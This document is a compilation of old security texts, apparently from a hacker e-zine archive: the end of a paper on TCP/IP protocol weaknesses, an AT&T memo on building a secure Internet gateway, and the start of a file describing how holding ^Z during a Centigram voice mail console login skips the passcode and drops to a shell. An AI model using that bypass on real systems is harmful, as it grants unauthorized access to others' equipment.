of service attack has taken place; this, in the military world, is far less serious than information loss. The BFE also translates the original ("Red") IP address to an encrypted ("Black") address, using a translation table supplied by the ACC. This is done to foil traffic analysis techniques, the bane of all multi-point link encryption schemes. End-to-end encryption, above the TCP level, may be used to secure any conversation, regardless of the number of hops or the quality of the links. This is probably appropriate for centralized network management applications, or other point-to-point transfers. Key distribution and management is a greater problem, since there are more pairs of correspondents involved. Furthermore, since encryption and decryption are done before initiation or after termination of the TCP processing, host-level software must arrange for the translation; this implies extra overhead for each such conversation10. End-to-end encryption is vulnerable to denial of service attacks, since fraudulently-injected packets can pass the __________ 10. We are assuming that TCP is handled by the host, and not by a front-end processor. TCP checksum tests and make it to the application. A combination of end-to-end encryption and link-level encryption can be employed to guard against this. An intriguing alternative would be to encrypt the data portion of the TCP segment, but not the header; the TCP checksum would be calculated on the cleartext, and hence would detect spurious packets. Unfortunately, such a change would be incompatible with other implementations of TCP, and could not be done transparently at application level. Regardless of the method used, a major benefit of encrypted communications is the implied authentication they provide. If one assumes that the key distribution center is secure, and the key distribution protocols are adequate, the very ability to communicate carries with it a strong assurance that one can trust the source host's IP address for identification. This implied authentication can be especially important in high-threat situations. A routing attack can be used to "take over" an existing connection; the intruder can effectively cut the connection at the subverted machine, send dangerous commands to the far end, and all the while translate sequence numbers on packets passed through so as to disguise the intrusion. It should be noted, of course, that any of these encryption schemes provide privacy. Often that is the primary goal of such systems. 7.3 Trusted Systems Given that TCP/IP is a Defense Department protocol suite, it is worth asking to what extent the Orange Book[48] and Red Book[49] criteria would protect a host from the attacks described above. That is, suppose that a target host (and the gateways!) were rated B1 or higher. Could these attacks succeed? The answer is a complex one, and depends on the assumptions we are willing to make. In general, hosts and routers rated at B2 or higher are immune to the attacks described here, while C2-level systems are susceptible. B1-level systems are vulnerable to some of these attacks, but not all. In order to understand how TCP/IP is used in secure environments, a brief tutorial on the military security model is necessary. All objects in the computer system, such as files or network channels, and all data exported from them, must have a label indicating the sensitivity of the information in them. This label includes hierarchical components (i.e., Confidential, Secret, and Top Secret) and non-hierarchical components. Subjects -- i.e., processes within the computer system -- are similarly labeled. A subject may read an object if its label has a higher or equal hierarchical level and if all of the object's non- hierarchical components are included in the subject's label. In other words, the process must have sufficient clearance for the information in a file. Similarly, a subject may write to an object if the object has a higher or equal level and the object's non-hierarchical components include all of those in the subject's level. That is, the sensitivity level of the file must be at least as high as that of the process. If it were not, a program with a high clearance could write classified data to a file that is readable by a process with a low security clearance. A corollary to this is that for read/write access to any file, its security label must exactly match that of the process. The same applies to any form of bidirectional interprocess communication (i.e., a TCP virtual circuit): both ends must have identical labels. We can now see how to apply this model to the TCP/IP protocol suite. When a process creates a TCP connection, that connection is given the process's label. This label is encoded in the IP security option. The remote TCP must ensure that the label on received packets matches that of the receiving process. Servers awaiting connections may be eligible to run at multiple levels; when the connection is instantiated, however, the process must be forced to the level of the connection request packet. IP also makes use of the security option[50]. A packet may not be sent over a link with a lower clearance level. If a link is rated for Secret traffic, it may carry Unclassified or Confidential traffic, but it may not carry Top Secret data. Thus, the security option constrains routing decisions. The security level of a link depends on its inherent characteristics, the strength of any encryption algorithms used, the security levels of the hosts on that network, and even the location of the facility. For example, an Ethernet cable located in a submarine is much more secure than if the same cable were running through a dormitory room in a university. Several points follow from these constraints. First, TCP- level attacks can only achieve penetration at the level of the attacker. That is, an attacker at the Unclassified level could only achieve Unclassified privileges on the target system, regardless of which network attack was used11. Incoming packets with an invalid security marking would be rejected by the gateways. Attacks based on any form of source-address authentication should be rejected as well. The Orange Book requires that systems provide secure means of identification and authentication; as we have shown, simple reliance on the IP address is not adequate. As of the B1 level, authentication information must be protected by cryptographic checksums when transmitted from machine to machine12. The authentication server is still problematic; it can be spoofed by a sequence number attack, especially if netstat is available. This sort of attack could easily be combined with source routing for full interactive access. Again, cryptographic checksums would add significant strength. B1-level systems are not automatically immune from routing attacks; RIP-spoofing could corrupt their routing tables just as easily. As seen, that would allow an intruder to capture passwords, perhaps even some used on other trusted systems. To be sure, the initial penetration is still restricted by the security labelling, but that may not block future logins captured by these means. Routing attacks can also be used for denial of service. Specifically, if the route to a secure destination is changed to require use of an insecure link, the two hosts will not be able to communicate. This change would probably be detected rather quickly, though, since the gateway that noticed the misrouted packet would flag it as a security problem. At the B2 level, secure transmission of routing control information is required. Similar requirements apply to other network control information, such as ICMP packets. __________ 11. We are assuming, of course, that the penetrated system does not have bugs of its own that would allow further access. 12. More precisely, user identification information must be protected to an equal extent with data sensitivity labels. Under certain circumstances, described in the Red Book, cryptographic checks may be omitted. In general, though, they are required. Several attacks we have described rely on data derived from "information servers", such as netstat and finger. While these, if carefully done, may not represent a direct penetration threat in the civilian sense, they are often seen to represent a covert channel that may be used to leak information. Thus, many B-division systems do not implement such servers. In a practical sense, some of the technical features we have described may not apply in the military world. Administrative rules[51] tend to prohibit risky sorts of interconnections; uncleared personnel are not likely to have even indirect access to systems containing Top Secret data. Such rules are, most likely, an accurate commentary on anyone's ability to validate any computer system of non- trivial size. 8. CONCLUSIONS Several points are immediately obvious from this analysis. The first, surely, is that in general, relying on the IP source address for authentication is extremely dangerous13. Fortunately, the Internet community is starting to accept this on more than an intellectual level. The Berkeley manuals[3] have always stated that the authentication protocol was very weak, but it is only recently that serious attempts (i.e., Kerberos[35] and SunOS 4.0's DES authentication mode[52]) have been made to correct the problem. Kerberos and SunOS 4.0 have their weaknesses, but both are far better than their predecessor. More recently, an extension to the Network Time Protocol (NTP)[53] has been proposed that includes a cryptographic checksum[54]. A second broad class of problems is sequence number attacks. If a protocol depends on sequence numbers -- and most do -- it is vital that they be chosen unpredictably. It is worth considerable effort to ensure that these numbers are not knowable even to other users on the same system. __________ 13. There are some exceptions to this rule. If the entire network, and all of its components (hosts, gateways, cables, etc.) are physically protected, and if all of the operating systems are sufficiently secure, there would seem to be little risk. We may generalize this by by stating that hosts should not give away knowledge gratuitously. A finger server, for example, would be much safer if it only supplied information about a known user, rather than supplying information about everyone logged on. Even then, some censorship might be appropriate; a refusal to supply the last login date and other sensitive information would be appropriate if the account was not used recently. (Never-used accounts often have simple default passwords. Infrequently-used accounts are often set up less carefully by the owner.) We have also seen how netstat may be abused; indeed, the combination of netstat with the authentication server is the single strongest attack using the standardized Internet protocols. Finally, network control mechanisms are dangerous, and must be carefully guarded. Static routes are not feasible in a large-scale network, but intelligent use of default routes and verifiable point-to-point routing protocols (i.e., EGP) are far less vulnerable than broadcast-based routing. 9. ACKNOWLEDGEMENTS Dave Presotto, Bob Gilligan, Gene Tsudik, and especially Deborah Estrin made a number of useful suggestions and corrections to a draft of this paper. REFERENCES 1. E.J. Feinler, O.J. Jacobsen, M.K. Stahl, C.A. Ward, eds. DDN Protocol Handbook. DDN Network Information Center, SRI International, 1985. 2. Comer, D. Internetworking with TCP/IP: Principles, Protocols, and Architecture. Prentice Hall, 1988 3. Computer Systems Research Group. UNIX User's Reference Manual (URM). 4.3 Berkeley Software Distribution Virtual Vax-11 Version. Computer Science Division, Department of Electrical Engineering and Computer Science, University of California, Berkeley. 1986. 4. Spafford, E.H. The Internet Worm Program: An Analysis. Purdue Technical Report CSD-TR-823, Department of Computer Sciences Purdue University, West Lafayette, IN. 1988 5. Seeley, D. A Tour of the Worm. Department of Computer Science, University of Utah. 1988. 6. Eichin, M. and Rochlis, J. With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988. Massachussetts Institute of Technology, 1988. 7. Morris, R.T. 1985. A Weakness in the 4.2BSD UNIX TCP/IP Software. Computing Science Technical Report No. 117, AT&T Bell Laboratories, Murray Hill, New Jersey. 8. Reynolds, J.K., and J. Postel. Assigned Numbers. RFC 990, 1986 9. Mills, D.L. Internet Delay Experiments, RFC 889, 1983. 10. Blum, M. and Micali, S. "How to Generate Cryptographically Strong Sequences of Pseudo-Random Bits". SIAM J Computing, vol. 13, no. 4, pp. 850-864, Nov. 1984. 11. US Federal Information Processing Standards Publication (FIPS PUB) 46, Data Encryption Standard, 15 January 1977. 12. US Federal Information Processing Standards Publication (FIPS PUB) 81. DES Modes of Operation, 2 December 1980. 13. Bishop, M. An Application of a Fast Data Encryption Standard Implementation. Technical Report PCS-TR88-138, Department of Mathematics and Computer Science, Dartmouth College, Hanover, NH. 1988. 14. Mogul, J. "Simple and Flexible Datagram Access Controls for UNIX-based Gateways", Proceedings, Summer USENIX, 1989, Baltimore, Maryland (to appear). 15. Hedrick, C. Routing Information Protocol. RFC 1058, 1988. 16. Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984. 17. Postel, J. Internet Control Message Protocol. RFC 792, 1981. 18. St. Johns, M. Authentication Server. RFC 931, 1985. 19. Defense Advanced Research Projects Agency, Internet Activities Board. IAB Official Protocol Standards. RFC 1083, 1988 19. Postel, J. Private communication. 1989. 20. Needham, R.M. and Schroeder, M.D. "Using Encryption for Authentication in Large Networks of Computers". Communications of the ACM, vol. 21, no. 12, pp. 993-999, December 1978. 21. Denning, D.E. and Sacco, G.M. "Timestamps in Key Distribution Protocols", Communications of the ACM, vol. 24, no. 8, pp. 533-536, August 1981. 22. Needham, R.M. and Schroeder, M.D. "Authentication Revisited", Operating Systems Review, vol. 21, no. 1, p. 7, January 1987. 23. Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977. 24. Grampp, F.T. and Morris, R.H. "UNIX Operating System Security", AT&T Bell Laboratories Technical Journal, vol. 63, no. 8, part 2, October, 1984. 25. Crocker, D. Standard for the Format of ARPA-Internet Text Messages. RFC 822, 1982. 26. Postel, J. Simple Mail Transfer Protocol. RFC 821, 1982. 27. Linn, J. Privacy Enhancement for Internet Electronic Mail: Part I: Message Encipherment and Authentication Procedures. RFC 1040, 1988. 28. Butler, M.; Postel, J.B.; Chase, D.; Goldberger, J.; Reynolds, J.K. Post Office Protocol - Version 2. RFC 937, 1985. 29. Diffie, W. "The First Ten Years of Public Key Cryptography". Proc. IEEE, vol. 76, no. 5, pp. 560- 577, May 1988. 30. Rose, M. Post Office Protocol - Version 3. RFC 1081, 1988 31. Lambert, M.L. PCMAIL: A Distributed Mail System for Personal Computers. RFC 1056, 1988 32. Mockapetris, P. Domain Names - Concepts and Facilities. RFC 1034, 1987. 33. Mockapetris, P. Domain Names - Implementations and Specifications. RFC 1035, 1987. 34. Dyer, S.P. "Hesiod", Proceedings, Winter USENIX, 1988, Dallas, Texas. 35. Steiner, J.G, Neuman, C., Schiller, J.I. "Kerberos: An Authentication Service for Open Network Systems", Proceedings, Winter USENIX, 1988, Dallas, Texas. 36. Postel, J. File Transfer Protocol. RFC 959, 1985. 37. Case, J., Fedor, M., Schoffstall, J., and Davin, J. A Simple Network Management Protocol. RFC 1067, 1988. 38. McCloghrie, K. and Rose, M. Management Information Base for Network Management of TCP/IP-based Internets. RFC 1066. 1988. 39. Finlayson, R.; Mann, T.; Mogul, J.; Theimer, M. Reverse Address Resolution Protocol. RFC 903, 1984. 40. Sollins, K.R. The TFTP Protocol (Revision 2). RFC 783, 1981. 41. Croft, W.J.; Gilmore, J. Bootstrap Protocol. RFC 951, 1985. 42. Plummer, D.C. An Ethernet Address Resolution Protocol. RFC 826, 1982. 43. Diffie, W. and Hellman, M.E. "New Directions in Cryptography." IEEE Transactions on Information Theory, vol. IT-22, no. 6, pp. 644-654. 44. Voydock, V.L. and Kent, S.T. "Security Mechanisms in High-Level Network Protocols". ACM Computer Surveys, vol. 15, no. 2, pp. 135-171, June 1983. 45. Davies, D.W. and Price, W.L. Security for Computer Networks: An Introduction to Data Security in Teleprocessing and Electronic Funds Transfer. Wiley. 1984. 46. Defense Communications Agency. Defense Data Network Subscriber Security Guide. 1983. 47. "Blacker Front End Interface Control Document", in DDN Protocol Handbook. DDN Network Information Center, SRI International, vol. 1, 1985. 48. DoD Computer Security Center. DoD Trusted Computer System Evaluation Criteria, 1983, CSC-STD-001-83. 49. National Computer Security Center. Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria. NCSC-TG-005, Version 1, July 31, 1987. 50. St. Johns, M. Draft Revised IP Security Option. RFC 1038, 1988. 51. DoD Computer Security Center. Technical Rationale Behind CSC-STD-003-85: Computer Security Requirements, CSC-STD-004-83, 1983. 52. Taylor, B. and Goldberg, D. "Secure Networking in the Sun Environment". Proceedings, Summer USENIX, 1986, Atlanta, Georgia. 53. Mills, D.L. Network Time Protocol (Version 1) Specification and Implementation. RFC 1059, 1988. 54. Mills, D.L. Mailing list message <8901192354.aa03743@Huey.UDEL.EDU>, January 19, 1989. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The Design of a Secure Internet Gateway Bill Cheswick 10 September 1991 TECHNICAL MEMORANDUM Abstract -------- The Internet supports a vast and growing community of computer users around the world. Unfortunately, this network can provide anonymous access to this community by unscrupulous, careless, or dangerous people. On any given Internet there is a certain percentage of poorly-maintained systems. AT&T has a large internal Internet that we wish to protect from outside attacks, while providing useful services between the two. This paper describes our Internet gateway. It is an application-level gateway that passes mail and many of the common Internet services between our internal machines and the Internet. This is accomplished without IP connectivity using a pair of machines: a trusted internal machine and an untrusted external gateway. These are connected by a private link. The internal machine provides a few carefully-guarded services to the external gateway. This configuration helps protect the internal internet even if the external machine is fully compromised. This is a slightly-updated version of the paper presented at the 1990 summer Usenix at Anaheim. Introduction ------------ The design of a Corporate gateway to the Internet must deal with the classical tradeoff between security and convenience. Most institutions opt for convenience and use a simple router between their internal internets and the rest of the world. This is dangerous. Strangers on the Internet can reach and test every internal machine. With workstations sitting on many desks, system administration is often decentralized and neglected. Passwords are weak or missing. A professor or researcher often may install the operating system and forget it, leaving well-known security holes uncorrected. For example, a sweep of 1,300 machines inside Bell Labs around the time of the Internet Worm found over 300 that had at least one of several known security holes. When we first obtained a connection to the ARPAnet, Dave Presotto configured our gateway mache (named arpa) as an application-level gateway. For two years this machine was the sole official link to the Internet for AT&T. Until its disconnection in 1989, this VAX 750 handled all the Internet mail traffic and other services for the company. Arpa had Ethernet connections to both the inside and outside Internets, just like a router. It could also make and accept calls on our corporate Datakit network. Dave took a number of steps to make our gateway more secure. He turned off IP forwarding in the kernel so packets could not travel between the Internets. He installed a kernel modification that limited TCP connections from arpa to the inside network to smtp, uucp, named, and hostname ports. And he rejected the sendmail mailer as too complicated and dangerous: the Upas [cite upas] mailer was installed in its place. We removed a number of non-essential daemons, including the finger server. To give insiders access to the Internet, a gate service was installed on arpa. Insiders could call this service and supply an Internet address. The gate connected to a socket of a remote Internet host and then copied bytes between the two connections. It was easy to provide atelnet, a version of telnet that used the gate service. Aftp supplied FTP services: it was the standard ftp modified so both the command and data connections were initiated from the inside. (The standard ftp would have tried to make the data connection from arpa to the inside, a connection prohibited by arpa's kernel.) This configuration successfully resisted the Internet worm. We ran neither sendmail nor fingerd, the two programs exploited by the worm. [cite seeley] The internal internet was spared the infection. (Actually, there was a second, unguarded IP link to the Outside. We got lucky: only a few machines at the other end knew of the link, and their machines were shut down before the worm could creep across.) Had arpa been infected, the worm could have reached the inside machines. The initial smtp sendmail connection was permitted, and the worm's second connection would have been initiated from the inside target machine into arpa, the permitted direction. The new gateway --- --- ------- All of arpa's protection has, by design, left the internal AT&T machines untested---a sort of crunchy shell around a soft, chewy center. We run security scans on internal machines and bother system administrators when holes are found. Still, it would be nice to have a gateway that is demonstrably secure to protect the internal machines. For peace of mind, the gateway design should not rely on vendors' code more than absolutely necessary. We would like the internal machines protected even if an invader breaks into the gateway machine, becomes root, and creates and runs a new kernel. We had to replace arpa. The VAX 750 ran with typical load averages of seven to twelve jobs throughout the day. When the load average hit about fifteen, the old Datakit driver expired, wedging the Datakit ports and requiring a reboot. A new machine gave the opportunity for a clean start. We could re-think the security arrangements to improve on arpa's shortcomings. Our new gateway machine, named inet, is a MIPS M/120 running RISC/OS, a System V implementation with Berkeley enhancements. Various daemons and critical programs have been obtained from other sources, checked, and installed. We store nothing vital or secret on inet, since we assume that it may be defeated in unforeseen ways. It does not run uucp---systems files and dialers could fall into the wrong hands. There are few system administration accounts, and user accounts are discouraged. Inet is not used for other tasks. It is backed up regularly, and scanned for unauthorized changes and common system administration mistakes. Though we don't trust inet, we protect it as much as we can. Inet has a single Ethernet port which is connected to a router on JVNCnet, our external regional network. It also has a connection to Datakit. We have configured our DatÐtakit controller to force all connections from inet to a single internal machine, named r70. R70 can redial, or splice connections to other internal machines. R70 provides a limited set of services to inet for reaching internal machines. The list of services are: 1. connection to an approved machine's smtp port, 2. connection to a login or trusted-login Datakit destination after passing a challenge-response test, and 3. connection to a logging service. The key to the arrangement is a restricted channel from inet to r70. This private channel was easily constructed using stock features of our research Datakit controller. Other connection schemes could be implemented using a simple multiplexed protocol over some back-to-back connection between the machines, or a simple two-machine Ethernet would suffice. If the last approach is used with TCP, the internal machine must supply differing TCP services to its two Ethernet interfaces. (I am not sure this is possible with stock commercial TCP software. It wouldn't be too hard to modify inetd to do this.) These functions do not load the internal machine too much; it could have other uses like uucp, mail, or even normal user jobs. But the services it provides the external machine are the key to security, and must be protected well. Outbound services -------- -------- It is quite easy to implement most outbound services to the Internet. Inet has a small program, named proxy (a descendant of arpa's gate), that makes calls to the Internet on behalf of an inside machine and relays bytes between the inside Datakit connection and the outside Internet TCP connection. Proxy can also listen to a non-privileged socket and report connections to an inside process. Several outbound services are implemented using proxy, and more are easy to create. In all cases, it appears to the remote Internet hosts that our gateway machine is making the calls. %%%% picture of a proxy call Inet may be reached over the Datakit. But how do internal machines reach inet over the Ethernet? R70 responds to two IP addresses: its own, and an internal IP address for inet. (Dave Presotto implemented this after a trivial change to the Tenth Edition Research Unix connection server. [cite connection] Calls to certain TCP ports on this internal IP address invoke dcon, a program that simply relays the bytes between the TCP port and Datakit connections on inet. I have replaced the old aftp and atelnet with ptelnet and pftp. They work in the same manner, but the new routines call a portable implementation of ipcopen, a piece of the connection server. Ipcopen hides the details of a connection (TCP sockets or Datakit), simplifying the application program. For example: ptelnet tcp!toucan connects to machine toucan on our internet, and ptelnet proxy!ernie.berkeley.edu connects to ernie.berkeley.edu on the external Internet. proxy! is the default. The ipcopen implementation is not flawless: some socket features such as out-of-band data and the urgent pointer are missing because they are not supported by Datakit. Ptelnet was stripped down to avoid these features. %%%% figure of a proxy Pftp provides FTP access in a similar manner. It is an updated version of aftp from arpa. The ipcopen routines allow it to work over Datakit. The proxy software is available by anonymous FTP from toucan.zoo.att.com. The file is proxy.tar.Z. % figure of pftp and ftp function Outgoing mail is sent to inet via smtp over either Datakit or the internal Internet. It is stored and forwarded from there. Upas performs the mail gateway functions. $ telnet research.att.com Trying... Connected to research.att.com. Escape character is '^]'. RISC/os (inet) login: guard RISC/os (UMIPS) 4.0 inet Copyright 1986, MIPS Computer Systems All Rights Reserved Security Authentication check login: ches Enter response code for 90902479: 818b71fe Destination please: coma OKYou have mail. coma=; date Tue Nov 14 10:52:37 EST 1989 coma=; Eof Connection closed by foreign host. $ *A connection session through the guard.* Inbound services ------- -------- We provide incoming login and mail service. For incoming file transfer, inet provides an anonymous FTP service. We do not trust our passwords to the Internet: it is too easy to eavesdrop or steal packets. See [cite smb] for a discussion of these security problems. Login service requires a hand-held authenticator (HHA). These are calculator-sized devices that contain DES encryption and a manually-loaded 64-bit key. They cost about $60. Inbound login service is provided through an authentication manager on r70. A session is shown in figure [ref connect]. To connect, the following sequence occurs: 1. The Internet caller uses telnet to connect to research.att.com inet via telnet. The login name is tt guard. 2. The tt guard login connects to the authentication manager on r70 over the Datakit. It spends the rest of the connection relaying bytes between the two connections. 3. The authentication manager on r70 requests a login name. 4. R70 sends a random challenge number, which the caller supplies. 5. The user enters the challenge into his HHA. 6 The HHA encrypts the challenge using a pre-loaded DES key, and displays the response. 7. The user types the response. He has three tries to answer a challenge correctly, and is disconnected if he fails. 8. The authorization manager prompts for a Datakit destination. 9. When the user enters the destination, the manager sends a redial request to the Datakit controller with the given destination and a service of `dcon'. For machines that trust r70, the `dcon' service bypasses further logins and avoids further passwords. 10. The redial request transfers the call, switching r70 out of the connection. Connections for a TCP host are handed to rlogin. Users may wish to trust the gate machine and so avoid typing any passwords over the internet. TCP callers can put r70-mhbb.research.att.com in their .rhosts file. For Datakit connections using the standard DKHOST software, they can log in through the guard once using ptelnet, and then request the destination area/exchange/host.authorize.t. This will connect them to their own machine's authorization server, which will prompt them for a login and password. Obviously, this should be done from a secure terminal, and not from out on the Internet. (Both of these practices are dangerous. Do you really want to trust r70? It is probably safer than entering passwords on some alien workstation out on the Internet. We frown on user-level authentication in general, preferring to have the system administrator make and support these judgements.) Each user requires a DES key, and keys have an expiration date. The key file is stored on r70 in a file readable only by root. This is unfortunate, and the file will probably move into an authentication manager somewhere. Inbound mail is delivered directly to inet. Inet checks the destination. If it is a trusted machine (i.e. its smtp is trusted), a connection request is sent to r70. If not, the mail is relayed through an accessible internal machine. R70 will permit connections only to trusted smtp implementations. The list is short because most internal machines run sendmail. % so why do we need inet? Why not a Cisco with inet on the inside? %% The restricted list of known 112 smtps should be justified both from %% a security standpoint and a practicality one -- some smtps (i.e., %% sendmail on sunos) have security bugs. Thus, the techniques used %% to let logins through are not acceptable for mail. % what about network file system connections into inet? Another hole? %% You may want to have two public ftp directories, though I'm not certain %% exactly how to set things up this way without giving out inet logins. %% 'pub' is mode 555 or 755 not owned by ftp; it's used for 'blessed' %% outgoing packages that we advertise for pickup. 'incoming' is mode 333 %% or 733 -- i.e., not readable from the outside. If you know the %% file name, you can pick it up, but you can't snoop for stuff. This %% avoids things like you putting a file in there for me, but a cracker %% plants a horse before I get to it. I've recommended a similar scheme %% to the Comp Centers; they like it so far. %% How does ftpd work without running as root? On Berkeley systems %% at least, it can't function without being root when talking to %% a client that doesn't generate PORT commands. Protecting INET ---------- ---- The preceding precautions might imply that we expect our gateway to be compromised at some point. In fact, we are taking great pains to protect the machine, including the usual good system administration steps needed to secure any Unix system [cite ritchie]: directory and file permissions are checked, backups performed regularly, etc. We have taken some steps to avoid denial-of-service attacks. For example, the logs, the spool directory, and the publically-accessible FTP directory are each on separate file systems. If a stranger fills the public FTP directory, there is still room for the logs. Here are some other steps taken: 1. All the important executable files are periodically checksummed and checked for changes. 2. Most user accounts do not have passwords to be checked. They obtain permission to login based on the source of the call. 3. User accounts are discouraged. 4. Non-essential network daemons have been removed: we don't need to trust them. 5. Inetd(8) handles all network connections. Certain modifications allow telnetd, smtpd, and ftpd to run with reduced permissions: [cite ritchie] inetd handles the privileged stuff. 6. There is extensive logging of network activity, including connection and login attempts. Logs are stored forever on a WORM-based backup system. 7. Since the network daemons are so important to the security of the machine, we obtained the latest BSD versions and examined, modified, and installed them. Gateway alternatives ------- ------------ There are several much simpler alternatives for an Internet gateway. The simplest is a router, which just lets the packets through. Some routers, like Cisco's, provide packet filtering that can block various types of access to an institution. We did not choose the router. Though the filtering is quite good, it's not clear whether a clever worm could get through the permitted ports. Can we trust the router? If telnet access is allowed from the outside, inside machines are exposed to password-guessing attacks. If telnet access is not allowed, an alternative is needed anyway, requiring additional provisions. The router does not provide logging to detect invasion attempts. And mail gating must be provided by a machine somewhere: it is unreasonable to expect each internal machine to be configured to handle all the varieties of external mail addressing. Many Internet sites use a gateway machine like a Sun. These machines forward IP packets in both directions, and provide a mail gateway service. The packet flow is still dangerous, though filtering is available. Many internal machines may trust the gate machine, leaving them further exposed if the gate machine is compromised. Performance ----------- The mail throughput of the new gateway has been gratifying, though a VAX 750 is an easy act to follow. In many cases, we have had replies to cross-country mail return in less than a minute. It sometimes seems that the mail must have bounced. Inet has little else to do, and a MIPS M/120 is a fast machine. Pftp transfers are fastest over Datakit, since they avoid the dcon gateway in r70. File transfers range from 17 to 44 Kb/sec. TCP transfers through r70 run at 9 to 16 Kb/sec. By comparison, thinspace ftp on inet runs at about 60--90 Kb/sec. Clearly, security has its costs. But these are top speeds. The limiting factor is often the external net or host. The throughput seems adequate, and there have been no complaints. % ftp> get /vmunix /dev/null % 200 PORT command okay. % 150 Opening data connection for /vmunix (192.20.225.2,2242) (707584 bytes). % 226 Transfer complete. % 707584 bytes received in 15.834 seconds (43.64 Kbytes/s) % % 19505 bytes from pilot.njin.net: % dk to inet: 1.1 sec 17.3 K/sec % TCP to inet: 1.4 sec 13.6 K/sec % dk to att-in: 13 sec 1.5 K/sec % % 17403 bytes from uunet.uu.net: % dk to inet: .84 sec 20.2 K/sec % TCP to inet: 1.9 sec 8.9 K/sec % dk to att-in: 9.2 sec 1.8 K/sec % % Conclusions ----------- The new gateway achieves a useful balance of utility and security. Most internal users seem to be happy with pftp and ptelnet. Some have asked for talk, resolver service and other UDP-based protocols. These could be provided with non-proxy services on inet accessible through Datakit. Steve Bellovin has cooked up a scheme to support X through the gateway. The security implications are frightening. There are certainly limits to our security. If r70 and inet are subverted, the inside machines could be attacked. Insiders can easily import trouble such as Trojan horses or programs infected with viruses. Our best defense is continued scanning of internal machines for security holes in case such a program gets loose. There is now a second AT&T internet gateway [cite horton]. Its configuration is based on this work. These two front doors provide reasonable security to an isolated internal internet. But AT&T is a large company, so we keep a constant watch to assure that no other links are made to the external Internet. A locked front door is useless if the back wall of the house is missing. The incoming guarded telnet service is not perfect. The remote telnet may be insecure, and the TCP connection itself could be stolen after login is complete. Most internal AT&T machines do not accept r70's judgement that the user is valid, and require their own login passwords. These passwords travel over the Internet in the clear. Our solution does have some drawbacks. We rely on two machines and Datakit to keep things working. This yields three points of failure, while the simpler approaches have (in some sense) only one point of failure. The use of TCP-level gateways does lower throughput. Though most users seem to be content with the pftp response, it would be nice to speed it up some. The uptime of this service is measured in months, and the mail transit time in seconds or minutes. This paper is not an invitation to come test the security of our gateway. It is management's policy to call the authorities when intruders are detected. Acknowledgements ---------------- Many people have contributed to the support of these gateways. Steve Bellovin did most of the initial work to get arpa talking to the ARPAnet and Datakit. Dave Presotto has supplied much of the software and most of the paranoia to provide a secure gateway. Howard Trickey implemented earlier versions of ptelnet and pftp. Dennis Ritchie has kept a watchful eye and stepped in when things broke. Steve Bellovin and others have provided numerous suggestions and warnings on various networking and security topics. Jim McKie ported many useful Research Unix [cite V10] functions and the INCON Datakit driver to our MIPS computers, making life much easier for me. 1. The box is completely reset. Enter a code digit and press "Enter": digit & hexadecimal encryption & "error" 0 & yes & yes 1 & yes & no 4 & no & yes 5 & no & no Hexadecimal encryption provides slightly higher security, but it is easy to mistake "6" and "b". In decimal mode, the hexadecimal characters "a"--"c" and "d"--"f" are mapped to "2" and "3" respectively. The guard software accepts either answer. The error mode displays "error" if an invalid PIN is entered. Five invalid entries will reset the box to . If "error" is off, the SNK provides an invalid encryption. We use mode 4. 2. Enter the DES key. The key consists of eight 8-bit bytes typed in octal. Press "Enter." 3. Enters a 4 to 16-digit PIN, followed by "Enter." 4. Re-enter the PIN, followed by "Enter." 5. Enter the PIN followed by "Enter". 6. Enter the challenge, followed by "Enter". The SNK displays the response. Programming the Hand Held Authenticator ----------- --- ---- ---- ------------- We use the Securenet Key SNK-4. It is available from Digital Pathways 221 West Grand Avenue Montvale NJ 07645 It costs $60 in unit quantities. Its major competitor is the SecureId card. The latter uses a time-based algorithm to generate the key and requires substantial and expensive software in the host. The SNK-4 needs a small program that uses the standard encrypt function. We program the SNK-4s by hand, though a PC-based system is available as well. Figure [ref programming] details the programming steps. The SNK shuts off automatically after 30 seconds. Press "On" to restart. We have found that the battery runs down in the SNK if the "On" button is pressed continuously, say, in luggage. The bumps around the "On" switch don't protect the switch well enough. We suggest storing the box in the original packing material. Bibliography ------------ upas David Presotto. Upas - a simpler approach to network mail. USENIX Summer Conference Proceedings, pps.533-538, June 1985. seeley Donn Seeley. A Tour of the Worm. USENIX Winter Conference Proceedings, Jan. 1989. connection David Presotto and Dennis Ritchie. Interprocess Communication in the Ninth Edition UNIX System. Unix Programmer's Manual, Tenth Edition. A. G. Hume and M. D. McIlroy, Editors. AT&T Bell Laboratories, Murray Hill, NJ. 1990. smb Bellovin, S.M. Security Problems in the TCP/IP Protocol Suite. Computer Communications Review, Vol. 9, No. 2; April, 1989, pps.32-48. ritchie Ritchie, Dennis M. On the Security of UNIX. Unix Programmer's Manual, Tenth Edition. A. G. Hume and M. D. McIlroy, Editors. AT&T Bell Laboratories, Murray Hill, NJ. 1990. V10 Unix Programmer's Manual, Tenth Edition, Volumes One and Two. A. G. Hume and M. D. McIlroy, Editors. AT&T Bell Laboratories, Murray Hill, NJ. 1990. horton Horton, Mark R. Charter for an Electronic Communication Gateway Service - Issue 1. %MRH CB 45264 4276 1E-271 45264-881003.01IM. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NIA074 / File 5 Notes on Centigram Voice Mail system Consoles Proper entry procedure, possible design flaw and serious security bug: Due to, I assume, more efficient task-handling and the desire for a more 'Unix-like' environment, the developers at Centigram needed for certain key functions to be available at all times. For instance, the ^Z key acts as the 'escape' key (these can be remapped, if desired). When necessary for some applications to use an 'escape' procedure, pressing this key can, in at leas cases, cause a drop to shell, or /cmds/qnxsh (possibly /cmds/sh, as well, but I'm used to seeing qnxsh). If this escape procedure were invoked during, say, /cmds/login, the resulting drop to shell would by-pass the 'Enter Passcode:' message. And it does. After calling the Centigram, normal procedure is to hit ^Z to activate the terminal, followed by the entry of the remote or console passcodes, and then proceeding with normal console activities. However, if ^Z is continually depressed during the login sequence, the login program will abort and run /cmds/qnxsh. The behavior may be somewhat erratic by the repeat use of the escape key, but when the $ prompt appears, usually, it doesn't deliberately go away without an 'exit' command or a ^D. Typically, a login pattern can develop to accommodate the erratic behavior something along the lines of: continuously depress ^Z until $ prompt appears, hit return, possibly get 'Enter Passcode:' message, hit return, and $ prompt appears again, set proper tty setting, and change directory appropriately, and continue with normal console functions. 